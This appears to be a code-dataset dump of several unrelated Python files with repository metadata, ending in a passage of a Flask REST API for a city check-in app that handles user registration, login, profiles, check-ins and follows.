                    current_courses[class_code][2] = end_time
                    continue
                elif choice == 3:
                    grade = input("Update current letter grade: ")
                    # Invalid grades fall back to the stored value; both the
                    # schedule entry and the full course list are updated.
                    if grade not in valid_grades:
                        print("Invalid input")
                        grade = current_courses[class_code][3]
                        current_courses[class_code][3] = grade.upper()
                        full_courses[class_code][1] = grade.upper()
                    else:
                        current_courses[class_code][3] = grade.upper()
                        full_courses[class_code][1] = grade.upper()
                    continue
            else:
                # Option 4: persist both dicts and leave the editor.
                with open('current_courses.json', 'w') as fp:
                    json.dump(current_courses, fp)
                with open('full_courses.json', 'w') as f_file:
                    json.dump(full_courses, f_file)
                break
        # Non-numeric menu or time input raises ValueError from int().
        except ValueError:
            print("Invalid input.")
            continue
    return 0
def clear_screen():
    """Clear the terminal, using the command that matches the host OS."""
    command = "cls" if os.name == 'nt' else "clear"
    os.system(command)
# Launch the application when the module is executed.
# NOTE(review): consider guarding with `if __name__ == "__main__":` so the
# module can be imported without starting the interactive UI.
start_here()
| [
"bryce.hollandsworth@gmail.com"
] | bryce.hollandsworth@gmail.com |
11e4cf3d438647c71cea8aba3c12937c79216d11 | 7d81464b641105a1dcf2b7ff21b1c03931734367 | /Statistic/env/bin/distro | e23a8d54cab13f6f871cb2a27fefa57357223d22 | [] | no_license | Syxoyi/potential-enigma | 140dbd11bf7adc00a72ef315fcf39ec45d820b62 | 020aead1b48bd8dd944786151812158fab6c71af | refs/heads/master | 2021-02-10T12:15:57.307328 | 2020-09-11T15:10:03 | 2020-09-11T15:10:03 | 244,380,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | #!/home/max/scrCATALOG/Python/potential-enigma/Statistic/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from distro import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"m.travushkin@r77.center-inform.ru"
] | m.travushkin@r77.center-inform.ru | |
f4d26a6a61e49126688770ec6fef27cf124a97c2 | d73aee2dbbef252318ffcc168da6dc007f46a381 | /GermanQuinonez/employee/person.py | 1b60e9a408c90b6a677c40e3ca245466ce6a5a5d | [] | no_license | oscarDelgadillo/AT05_API_Test_Python_Behave | e8c1641afc47888c7a2b6620e4948e3d5412a817 | 7755c0c296aeee61538ce11649a718dfb0f17a9c | refs/heads/master | 2021-05-12T07:41:33.278396 | 2018-01-22T23:42:47 | 2018-01-22T23:42:47 | 117,254,934 | 0 | 0 | null | 2018-01-12T15:08:34 | 2018-01-12T15:08:34 | null | UTF-8 | Python | false | false | 227 | py | class Person:
def __init__(self, name, last):
self.name = name
self.last_name = last
# self.age = age
# self.ci = ci
def get_name(self):
return self.name + " " + self.last_name
| [
"German.Quinonez@fundacion-jala.org"
] | German.Quinonez@fundacion-jala.org |
ee826811812b750833f028442f9616d4112a68c3 | c52486d99f3b3d24bbe8c4130297f037cea02e0f | /website/admin.py | d765828a8b4160ee604151aa876b040a1afc1615 | [] | no_license | boolow5/ESDI | 99a954143241a3d55f67e82f4c679dfe9ad5bbfe | 58a6b6347391b92cdb4c555a6be2451ea470cad3 | refs/heads/master | 2021-01-19T14:27:50.590711 | 2017-05-08T22:25:15 | 2017-05-08T22:25:15 | 88,163,432 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | py | from django.contrib import admin
from website.models import *
# Register your models here.
admin.site.register(Page)
admin.site.register(Image)
admin.site.register(Person)
admin.site.register(Organization)
admin.site.register(Country)
admin.site.register(PageSection)
| [
"boolow5@gmail.com"
] | boolow5@gmail.com |
579eb0fb7ac8eff088fd85e5a549022f8acc47eb | 91a90d3ea05a2a64f4c2cec12832932a683269ca | /ex1.py | 668f7a82c2b1f2d76ee88f1522ab9a768795d594 | [] | no_license | CataHax/lab3-py | c1e8048bcf51210bef380b64d2975ee4c52cf0fb | 78c1e275f5196e7ef58770ead08e1fdecc8fcf64 | refs/heads/main | 2023-05-05T10:23:18.863114 | 2021-06-04T16:33:24 | 2021-06-04T16:33:24 | 373,899,828 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | x1 = int(input("Enter the first number:"))
x2 = int(input("Enter the second number:"))
x3 = int(input("Enter the third number:"))
# now I must do three "if-s"
if x3 > x2 > x1:
print("increasing")
elif x1 > x2 > x3:
print("decreasing")
else:
print("nothing")
| [
"noreply@github.com"
] | noreply@github.com |
bfc3e9d0d6532309de3193b86d7f7002dd5b8709 | 265de8ea95605438664ace712a1a3f7f406b287a | /databass-flask/databass_api.py | 577138bebf54e7e30f5145dac9d5aa6933c8ae38 | [] | no_license | flyingdust777/CS411-DataBASS-public | f42090c874ca99c3c29743cf829a12765b4b842f | 6f0c95ddb7616cb4012c80eaf7d4280ea7f8201c | refs/heads/master | 2021-08-29T15:47:12.486064 | 2017-12-14T06:38:45 | 2017-12-14T06:38:45 | 113,407,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45,008 | py | # To-Do List:
# 1. Map country and region codes to their actual names
# 2. TEST THE FUNTIONALITY EXTENSIVELY!
# -------------------------------------------------------------------------------------------------------------------- #
# Import flask libraries
from flask import Flask, request, jsonify
from flask_api import status
from flask_bcrypt import Bcrypt
import requests
import db_config as dbc
# Connects Flask server to MySQL database
import mysql.connector as MySQL
# Generates access tokens
import binascii
import os
# Import libraries for checking the validity of usernames and email addresses
from string import ascii_letters
from string import digits
from string import punctuation
import re
# Used for error checking
import traceback
# -------------------------------------------------------------------------------------------------------------------- #
# Initialize flask app
# Initialize flask app and the bcrypt password-hashing helper.
app = Flask(__name__)
bcrypt = Bcrypt(app)

# Connect to the project database on the VM.
# NOTE(review): a single module-level connection is shared by all requests;
# mysql.connector connections are not safe for concurrent use — consider a
# per-request connection or a pool.
db = MySQL.connect(host=dbc.db_host,
                   port=dbc.db_port,
                   user=dbc.db_user,
                   password=dbc.db_password,
                   database=dbc.db_name,
                   buffered = True)
# -------------------------------------------------------------------------------------------------------------------- #
# User Registration
@app.route("/api/user/register", methods=["POST"])
def register():
    """Create a new user account and send a verification email.

    Form parameters: username, password, email_address, display_name.
    Returns JSON {"success": True} on success, otherwise
    {"success": False, "error_code": ...}.
    """
    # Read in registration input parameters
    username = request.form.get('username')            # String (a-z, A-Z, 0-9, -, _)
    password = request.form.get('password')            # String (6 <= characters <= 256)
    email_address = request.form.get('email_address')  # String (valid email)
    display_name = request.form.get('display_name')    # String (1 <= characters <= 265)
    # Reject missing or malformed parameters up front.
    check = check_for_none("register", [("username", username),
                                        ("password", password),
                                        ("email", email_address),
                                        ("display_name", display_name)])
    if check is not None:
        return jsonify(check), status.HTTP_200_OK
    check2 = validate_parameters("register",
                                 username=username,
                                 password=password,
                                 email_address=email_address,
                                 display_name=display_name)
    if check2 is not None:
        return jsonify(check2), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    # Reject usernames that are already taken.
    cursor.execute("SELECT username FROM user WHERE username=%s;", (username,))
    result = cursor.fetchone()
    if result:
        error_code = "user_register_username_in_use"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # All parameters are valid: create the account.
    # Store only a bcrypt hash of the password, never the plaintext.
    password_hash = bcrypt.generate_password_hash(password)
    # Random verification token: 64 random bytes -> 128 hex chars, which fills
    # the CHAR(128) email_token column; cleared to NULL once verified.
    email_token = binascii.hexlify(os.urandom(64)).decode()
    cursor.execute("INSERT INTO user values(%s, %s, %s, %s, NOW(), NULL, 0, 0, %s);",
                   (username, email_address, display_name, password_hash, email_token))
    db.commit()
    cursor.close()
    # Best-effort delivery: the user row is already committed, so a mail-API
    # failure must not turn the whole registration into a 500 (previously an
    # exception here did exactly that).
    try:
        send_email_verif(email_address, email_token)
    except Exception:
        print(traceback.format_exc())
    content = {"success": True}
    return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# User Login
@app.route("/api/user/login", methods=["POST"])
def login():
    """Authenticate a user and issue a fresh access token.

    Form parameters: username, password.
    On success returns the user's email_address, display_name and a new
    access_token; login is refused until the email address is verified
    (email_token is NULL).
    """
    # Read in login input parameters
    username = request.form.get('username')  # String (a-z, A-Z, 0-9, -, _)
    password = request.form.get('password')  # String (6 <= characters <= 256)
    # Reject missing or malformed parameters up front.
    check = check_for_none("login", [("username", username), ("password", password)])
    if check is not None:
        return jsonify(check), status.HTTP_200_OK
    check2 = validate_parameters("login", username=username, password=password)
    if check2 is not None:
        return jsonify(check2), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    cursor.execute("SELECT email_address, display_name, password_hash FROM user WHERE username=%s;", (username,))
    result = cursor.fetchone()
    # Deliberately report the same error for an unknown username and a wrong
    # password so the endpoint does not leak which usernames exist.
    if not result:
        error_code = "user_login_bad_credentials"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # Compare the supplied password against the stored bcrypt hash.
    is_correct_password = bcrypt.check_password_hash(str(result[2]), password)
    if not is_correct_password:
        error_code = "user_login_bad_credentials"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    email = result[0]
    display_name = result[1]
    # A non-NULL email_token means the address has not been verified yet.
    cursor.execute("SELECT email_token FROM user WHERE username=%s;", (username, ))
    result = cursor.fetchone()
    email_token = result[0]
    if email_token is not None:
        error_code = "user_email_not_verified"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # Issue a fresh random access token; this invalidates any previous one.
    access_token = binascii.hexlify(os.urandom(32)).decode()
    cursor.execute("UPDATE user SET access_token=%s WHERE username=%s;", (access_token, username))
    db.commit()
    cursor.close()
    content = {"success": True, "email_address": email, "display_name": display_name, "access_token": access_token}
    return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# User Logout
@app.route("/api/user/logout", methods=["POST"])
def logout():
    """Invalidate the user's current access token.

    Form parameters: username, access_token.
    """
    # Read in logout input parameters
    username = request.form.get('username')  # String (a-z, A-Z, 0-9, -, _)
    access_token = request.form.get('access_token')
    # Reject missing or malformed parameters up front.
    check = check_for_none("logout", [("username", username)])
    if check is not None:
        return jsonify(check), status.HTTP_200_OK
    check2 = validate_parameters("logout", username=username)
    if check2 is not None:
        return jsonify(check2), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
    result = cursor.fetchone()
    # Return a bad username error if the username isn't in the table
    if not result:
        error_code = "user_logout_bad_username"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The token must be present AND match; previously a missing form token
    # compared equal to a NULL stored token (None == None) and passed.
    elif access_token is None or access_token != result[0]:
        error_code = "user_bad_access_token"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    else:
        # Clearing the stored token logs the user out everywhere.
        cursor.execute("UPDATE user SET access_token=NULL WHERE username=%s;", (username,))
        db.commit()
        cursor.close()
        content = {"success": True}
        return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Search User
@app.route("/api/user/search", methods=["POST"])
def search():
    """Find users whose username starts with the given prefix.

    Form parameters: username (the caller), search_username (the prefix),
    access_token. Returns a list of {username, display_name} matches.
    """
    # Read in search input parameters
    username = request.form.get('username')                # String (a-z, A-Z, 0-9, -, _)
    search_username = request.form.get('search_username')  # String (a-z, A-Z, 0-9, -, _)
    access_token = request.form.get('access_token')
    # Reject missing or malformed parameters up front.
    check = check_for_none("search", [("username", username), ("search_username", search_username)])
    if check is not None:
        return jsonify(check), status.HTTP_200_OK
    check2 = validate_parameters("search", username=username, username2=search_username)
    if check2 is not None:
        return jsonify(check2), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
    result = cursor.fetchone()
    # Return a bad username error if the username isn't in the table
    if not result:
        error_code = "user_search_bad_username"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The token must be present AND match; previously a missing form token
    # compared equal to a NULL stored token (None == None) and passed.
    elif access_token is None or access_token != result[0]:
        error_code = "user_bad_access_token"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # Escape LIKE metacharacters: usernames may legally contain '_', which
    # would otherwise match ANY single character in the LIKE pattern.
    like_pattern = (search_username.replace("\\", "\\\\")
                                   .replace("%", "\\%")
                                   .replace("_", "\\_")) + "%"
    cursor.execute("SELECT username, display_name FROM user WHERE username LIKE %s;", (like_pattern,))
    results = cursor.fetchall()
    cursor.close()
    if not results:
        error_code = "user_search_no_results_found"
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    users = [{"username": result[0], "display_name": result[1]} for result in results]
    content = {"success": True, "results": users}
    return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# User Profile
@app.route("/api/user/profile/<username>", methods=["POST"])
def profile(username):
    """Return the public profile of ``username``.

    The caller authenticates via form parameters (username, access_token);
    the profile fetched is for the URL's <username>, which may be a
    different user. Returns display info, checkin/follow counts, score,
    achievements and the 15 most recent checkins.
    """
    # Read in profile input parameters
    logged_in_username = request.form.get('username')  # String (a-z, A-Z, 0-9, -, _)
    access_token = request.form.get('access_token')
    # Reject missing or malformed parameters up front.
    check = check_for_none("profile", [("username", logged_in_username)])
    if check is not None:
        return jsonify(check), status.HTTP_200_OK
    check2 = validate_parameters("profile", username=logged_in_username)
    if check2 is not None:
        return jsonify(check2), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    cursor.execute("SELECT access_token FROM user WHERE username=%s;", (logged_in_username,))
    result = cursor.fetchone()
    # Return a bad username error if the caller isn't in the table
    if not result:
        error_code = "user_profile_bad_username"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The token must be present AND match; previously a missing form token
    # compared equal to a NULL stored token (None == None) and passed.
    elif access_token is None or access_token != result[0]:
        error_code = "user_bad_access_token"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The profile view aggregates email, display name, join date, checkin
    # count, score and follower/following counts in one row.
    cursor.execute("SELECT * FROM profile WHERE username=%s;", (username,))
    user_info = cursor.fetchone()
    # Guard against a profile request for a nonexistent user; previously
    # this fell through to user_info[1] and crashed with a TypeError (500).
    if not user_info:
        error_code = "user_profile_user_not_found"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    email_address = user_info[1]
    display_name = user_info[2]
    join_date = user_info[3]
    checkin_count = user_info[4]
    score = user_info[5]
    following_count = user_info[6]
    follower_count = user_info[7]
    # Achievements earned by this user.
    cursor.execute("SELECT id,title,description,points FROM achievement WHERE id IN (SELECT achievement_id FROM achieve WHERE username =%s)", (username,))
    results = cursor.fetchall()
    achievements = [{"id": result[0], "title": result[1], "description": result[2], "points": result[3]} for result in results]
    # 15 most recent checkins, newest first, joined with city/country names.
    cursor.execute("SELECT city.name, checkin_time, latitude, longitude, accent_name, country.name " +
                   "FROM city, checkin, country " +
                   "WHERE id = city_id AND city.country = country.code AND username=%s " +
                   "ORDER BY checkin_time DESC " +
                   "LIMIT 0,15;", (username,))
    results = cursor.fetchall()
    cursor.close()
    recent_checkins = [{"city_name": result[0], "checkin_time": result[1], "latitude": float(result[2]), "longitude": float(result[3]), "accent_name": result[4], "country_name": result[5]} for result in results]
    content = {"success": True, "email_address": email_address, "display_name": display_name, "join_date": join_date,
               "checkin_count": checkin_count, "recent_checkins": recent_checkins, "score": score,
               "following_count": following_count, "follower_count": follower_count, "achievements": achievements}
    return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Change Password
@app.route("/api/user/changePassword", methods=["POST"])
def change_password():
    """Change a user's password after verifying the old one.

    Form parameters: username, old_password, new_password, access_token.
    """
    # Read in password change input parameters
    username = request.form.get('username')          # String (a-z, A-Z, 0-9, -, _)
    old_password = request.form.get('old_password')  # String (6 <= characters <= 256)
    new_password = request.form.get('new_password')  # String (6 <= characters <= 256)
    access_token = request.form.get('access_token')
    # Reject missing or malformed parameters up front.
    check = check_for_none("changePassword",
                           [("username", username), ("old_password", old_password), ("new_password", new_password)])
    if check is not None:
        return jsonify(check), status.HTTP_200_OK
    check2 = validate_parameters("changePassword", username=username, password=old_password, password2=new_password)
    if check2 is not None:
        return jsonify(check2), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    # Fetch both the stored hash and the access token in one query.
    cursor.execute("SELECT password_hash, access_token FROM user WHERE username=%s;", (username,))
    result = cursor.fetchone()
    # Return a bad username error if the username isn't in the table
    if not result:
        error_code = "user_changePassword_bad_username"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The old password must match the stored bcrypt hash.
    is_correct_password = bcrypt.check_password_hash(str(result[0]), old_password)
    if not is_correct_password:
        error_code = "user_changePassword_bad_old_password"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The token must be present AND match; previously a missing form token
    # compared equal to a NULL stored token (None == None) and passed.
    elif access_token is None or access_token != result[1]:
        error_code = "user_bad_access_token"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    else:
        # Store only a bcrypt hash of the new password.
        password_hash = bcrypt.generate_password_hash(new_password)
        cursor.execute("UPDATE user SET password_hash=%s WHERE username=%s;", (password_hash, username))
        db.commit()
        cursor.close()
        content = {"success": True}
        return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Change Display Name
@app.route("/api/user/changeDisplayName", methods=["POST"])
def change_display_name():
    """Update the user's display name.

    Form parameters: username, display_name, access_token.
    """
    # Read in display name change input parameters
    username = request.form.get('username')          # String (a-z, A-Z, 0-9, -, _)
    display_name = request.form.get('display_name')  # String (6 <= characters <= 256)
    access_token = request.form.get('access_token')
    # Reject missing or malformed parameters up front.
    check = check_for_none("changeDisplayName", [("username", username), ("display_name", display_name)])
    if check is not None:
        return jsonify(check), status.HTTP_200_OK
    check2 = validate_parameters("changeDisplayName", username=username, display_name=display_name)
    if check2 is not None:
        return jsonify(check2), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
    result = cursor.fetchone()
    # Return a bad username error if the username isn't in the table
    if not result:
        error_code = "user_changeDisplayName_bad_username"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The token must be present AND match; previously a missing form token
    # compared equal to a NULL stored token (None == None) and passed.
    elif access_token is None or access_token != result[0]:
        error_code = "user_bad_access_token"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    else:
        cursor.execute("UPDATE user SET display_name=%s WHERE username=%s;", (display_name, username))
        db.commit()
        cursor.close()
        content = {"success": True}
        return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Change Email Address
@app.route("/api/user/changeEmailAddress", methods=["POST"])
def change_email_address():
    """Update the user's email address.

    Form parameters: username, email_address, access_token.
    NOTE(review): the new address is stored without issuing a fresh
    email_token, so it is never re-verified — confirm whether that is
    intended before shipping.
    """
    # Read in email address change input parameters
    username = request.form.get('username')            # String (a-z, A-Z, 0-9, -, _)
    email_address = request.form.get('email_address')  # String (6 <= characters <= 256)
    access_token = request.form.get('access_token')
    # Reject missing or malformed parameters up front.
    check = check_for_none("changeEmailAddress", [("username", username), ("email_address", email_address)])
    if check is not None:
        return jsonify(check), status.HTTP_200_OK
    check2 = validate_parameters("changeEmailAddress", username=username, email_address=email_address)
    if check2 is not None:
        return jsonify(check2), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
    result = cursor.fetchone()
    # Return a bad username error if the username isn't in the table
    if not result:
        error_code = "user_changeEmailAddress_bad_username"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The token must be present AND match; previously a missing form token
    # compared equal to a NULL stored token (None == None) and passed.
    elif access_token is None or access_token != result[0]:
        error_code = "user_bad_access_token"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    else:
        cursor.execute("UPDATE user SET email_address=%s WHERE username=%s;", (email_address, username))
        db.commit()
        cursor.close()
        content = {"success": True}
        return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# City Checkin
@app.route("/api/user/checkin", methods=["POST"])
def checkin():
    """Record a checkin at the city nearest the supplied coordinates.

    Form parameters: username, access_token, latitude, longitude.
    The checkin is rejected if no known city lies within
    DISTANCE_THRESHOLD miles of the given point.
    """
    # Read in checkin input parameters
    username = request.form.get('username')          # String (a-z, A-Z, 0-9, -, _)
    access_token = request.form.get('access_token')  # String (6 <= characters <= 256)
    latitude = request.form.get('latitude')          # Float (-90 <= latitude <= 90)
    longitude = request.form.get('longitude')        # Float (-180 <= longitude <= 180)
    # Reject missing or malformed parameters up front.
    check = check_for_none("checkin", [("username", username), ("latlong", latitude), ("latlong", longitude)])
    if check is not None:
        return jsonify(check), status.HTTP_200_OK
    check2 = validate_parameters("checkin", username=username, latitude=latitude, longitude=longitude)
    if check2 is not None:
        return jsonify(check2), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
    result = cursor.fetchone()
    # Return a bad username error if the username isn't in the table
    if not result:
        error_code = "user_checkin_bad_username"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The token must be present AND match; previously a missing form token
    # compared equal to a NULL stored token (None == None) and passed.
    elif access_token is None or access_token != result[0]:
        error_code = "user_bad_access_token"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # Find candidate cities. The latitude band (LAT_BUFFER degrees) is a
    # cheap pre-filter before the exact great-circle distance (gcdist, in
    # miles) is computed. The first UNION arm is the closest city WITH a
    # recorded population within DISTANCE_THRESHOLD miles; the second is
    # the closest city overall.
    LAT_BUFFER = 0.1
    DISTANCE_THRESHOLD = 5
    cursor.execute("(" +
                   "SELECT * " +
                   "FROM " +
                   "(" +
                   "SELECT *, gcdist(%s, %s, latitude, longitude) AS distance_mi " +
                   "FROM city " +
                   "WHERE latitude " +
                   "BETWEEN (%s - %s) AND (%s + %s) " +
                   "HAVING distance_mi < %s " +
                   "ORDER BY distance_mi" +
                   ") AS city_tmp " +
                   "WHERE population > 0 " +
                   "ORDER BY distance_mi " +
                   "LIMIT 0,1" +
                   ")" +
                   "UNION" +
                   "(" +
                   "SELECT * " +
                   "FROM " +
                   "(" +
                   "SELECT *, gcdist(%s, %s, latitude, longitude) AS distance_mi " +
                   "FROM city " +
                   "WHERE latitude BETWEEN (%s - %s) AND (%s + %s) " +
                   "HAVING distance_mi < %s " +
                   "ORDER BY distance_mi" +
                   ") AS city_tmp " +
                   "ORDER BY distance_mi " +
                   "LIMIT 0,1" +
                   ");", (
                       latitude, longitude, latitude, LAT_BUFFER, latitude, LAT_BUFFER, DISTANCE_THRESHOLD,
                       latitude, longitude, latitude, LAT_BUFFER, latitude, LAT_BUFFER, DISTANCE_THRESHOLD))
    results = cursor.fetchall()
    if not results:
        error_code = "user_checkin_not_close_enough_to_city"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # NOTE(review): taking results[0] relies on the UNION preserving the
    # order of its arms (populated-city-first); SQL does not guarantee
    # UNION row order without an outer ORDER BY — confirm against MySQL
    # behavior or add an explicit ordering.
    final_result = results[0]
    country_code = final_result[1]
    cursor.execute("SELECT name FROM country WHERE code=%s;", (country_code,))
    country_row = cursor.fetchone()
    # Guard against a city whose country code has no country row; previously
    # this crashed with a TypeError (None[0]) and returned a 500.
    country_name = country_row[0] if country_row else "NA"
    cursor.execute("INSERT INTO checkin values(%s, %s, NOW());", (username, str(final_result[0])))
    db.commit()
    cursor.close()
    content = {"success": True, "city_name": final_result[2], "region_name": "NA", "region_code": final_result[3],
               "country_name": country_name, "country_code": final_result[1], "accent_name": final_result[7]}
    return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Follow User
@app.route("/api/user/follow", methods=["POST"])
def follow():
    """Make username_from follow username_to.

    Form parameters: username_from, username_to, access_token
    (authenticating username_from).
    """
    username_from = request.form.get('username_from')  # String (a-z, A-Z, 0-9, -, _)
    username_to = request.form.get('username_to')      # String (a-z, A-Z, 0-9, -, _)
    access_token = request.form.get('access_token')
    # Reject missing or malformed parameters up front.
    check = check_for_none("follow",
                           [("username_from", username_from), ("username_to", username_to)])
    if check is not None:
        return jsonify(check), status.HTTP_200_OK
    check2 = validate_parameters("follow", username=username_from, username2=username_to)
    if check2 is not None:
        return jsonify(check2), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username_from,))
    result = cursor.fetchone()
    # Return a bad username error if the follower isn't in the table
    if not result:
        error_code = "user_follow_bad_username_from"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The token must be present AND match; previously a missing form token
    # compared equal to a NULL stored token (None == None) and passed.
    elif access_token is None or access_token != result[0]:
        error_code = "user_bad_access_token"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The followee must also exist.
    cursor.execute("SELECT * FROM user WHERE username=%s;", (username_to,))
    result = cursor.fetchone()
    if not result:
        error_code = "user_follow_bad_username_to"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # Record the follow. A duplicate follow previously raised an unhandled
    # IntegrityError and surfaced as a 500; report it as a structured error.
    try:
        cursor.execute("INSERT INTO follow VALUES (%s, %s);", (username_from, username_to))
        db.commit()
    except MySQL.IntegrityError:
        db.rollback()
        cursor.close()
        content = {"success": False, "error_code": "user_follow_already_following"}
        return jsonify(content), status.HTTP_200_OK
    cursor.close()
    content = {"success": True}
    return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Unfollow User
@app.route("/api/user/unfollow", methods=["POST"])
def unfollow():
    """Make username_from stop following username_to.

    Form parameters: username_from, username_to, access_token
    (authenticating username_from). Deleting a non-existent follow is a
    no-op and still reports success.
    """
    username_from = request.form.get('username_from')  # String (a-z, A-Z, 0-9, -, _)
    username_to = request.form.get('username_to')      # String (a-z, A-Z, 0-9, -, _)
    access_token = request.form.get('access_token')
    # Reject missing or malformed parameters up front.
    check = check_for_none("unfollow",
                           [("username_from", username_from), ("username_to", username_to)])
    if check is not None:
        return jsonify(check), status.HTTP_200_OK
    check2 = validate_parameters("unfollow", username=username_from, username2=username_to)
    if check2 is not None:
        return jsonify(check2), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
